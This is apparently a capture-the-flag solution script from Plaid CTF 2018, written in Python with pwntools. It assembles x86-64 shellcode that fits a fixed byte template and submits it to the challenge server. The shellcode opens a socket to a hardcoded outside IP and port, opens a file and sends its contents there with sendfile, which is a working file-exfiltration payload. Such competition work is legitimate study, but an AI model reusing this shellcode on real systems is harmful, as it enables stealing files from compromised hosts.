Solution to the "Wait Wait ... Don't Shell me!" challenge from Plaid CTF 2018. The shellcode opens a file and sends it to a remote socket.
import binascii

from pwn import *
# Target is x86-64: asm()/disasm() below must use the amd64 encoder.
context.update(arch='amd64')
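# Byte template the challenge enforces on submitted shellcode: bytes given in
# hex are fixed, and every `__` is a wildcard the solver may fill freely.
# Wildcards are encoded as 0xcc so assemble() can tell them apart from the
# fixed bytes (none of the fixed bytes in the template is 0xcc).
# binascii.unhexlify is what str.decode('hex') did on Python 2 and also works
# on Python 3, where it yields bytes.
CODES = binascii.unhexlify(
    ''.join('''b8 __ __ __ __ bf __ __ __ __ be __ __ __ __ ba
__ __ __ __ 01 c7 29 fe 21 f2 0f 05 48 b8 __ __
__ __ __ __ __ __ 50 b8 __ __ __ __ ba __ __ __
__ bf __ __ __ __ 48 89 __ 0f 05 be __ __ __ __
bf __ __ __ __ ba __ __ __ __ 83 c0 __ 0f 05 89
__ b8 __ __ __ __ bf __ __ __ __ 41 ba __ __ __
__ 0f 05 58'''.split()).replace('__', 'cc')
)
# Debug aid: disassemble the template with the wildcards shown as NOPs (0x90).
#print disasm(CODES.replace('\xcc','\x90'),offset=False, byte=False)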
def assemble(code):
    """Assemble *code* and check it against the CODES template.

    Prints the disassembly and both lengths, then asserts that the
    assembled bytes are exactly as long as the template and agree with
    it on every fixed (non-0xcc) position.  Returns the values of the
    bytes that fall on wildcard positions, as ints, in template order.
    """
    assembled = asm(code)
    print disasm(assembled)
    print len(assembled), len(CODES)
    assert len(assembled) == len(CODES)
    free_bytes = []
    # Lengths are equal, so pairing template and assembled bytes is exact.
    for expected, actual in zip(CODES, assembled):
        if expected == '\xcc':
            free_bytes.append(ord(actual))
        else:
            assert expected == actual
    return free_bytes
# Offset added to the file-name address used by the shellcode below; a single
# guess of 0 is tried here.  To scan candidates instead, loop x over
# xrange(0, 0x100000, 0x100).
x = 0
try:
    conn = remote('wwdsm.chal.pwning.xxx',6615, level='error')
    print conn.recv()
    # Shellcode shaped to fit the CODES template: the opcodes land on the
    # template's fixed bytes and only immediates/ModRM bytes fall on the
    # wildcards.  The add/sub/and triple matches the fixed bytes
    # 01 c7 29 fe 21 f2 and leaves edi=2, esi=1, edx=0 for the socket call;
    # `add eax,SYS_open` uses the fixed 83 c0 (add eax, imm8) bytes and
    # relies on the preceding connect() having returned 0.  The movabs
    # constant is the sockaddr pushed for connect() (see the inline comment);
    # the fd returned by open() is then sendfile()'d to fd 0, the same fd
    # connect() was issued on.
    code = '''
mov eax, SYS_socket
mov edi, -SYS_socket+2
mov esi, 3
mov edx, 0
add edi,eax
sub esi,edi
and edx,esi
syscall
movabs rax,0x864add12d2040002 /*ip port AF_INET*/
push rax
mov eax,SYS_connect
mov edx,0x10
mov edi,0
mov rsi,rsp
syscall
mov esi,0
mov edi,0x400cb8+{}
mov edx,0
add eax,SYS_open
syscall
mov esi, eax
mov eax, SYS_sendfile
mov edi,0
mov r10d,0x999
syscall
pop rax
'''.format(x)
    # The service only takes the wildcard bytes, one hex byte per line.
    payload = '\n'.join('%02x' % b for b in assemble(code))
    conn.sendline(payload)
    print conn.recv()
    print conn.recvuntil('won!\n')
    print 0
    #conn.sendline('asdf')
    print conn.recv()
    print conn.recv()
    print conn.recv()
    print conn.recv()
except KeyboardInterrupt:
    pass
except Exception as e:
    # Connection or template-mismatch failures are reported, not fatal, so a
    # scan loop over x would simply move on to the next offset.
    print e
finally:
    print x
# Source: http://push0ebp.tistory.com/31 [Hacks]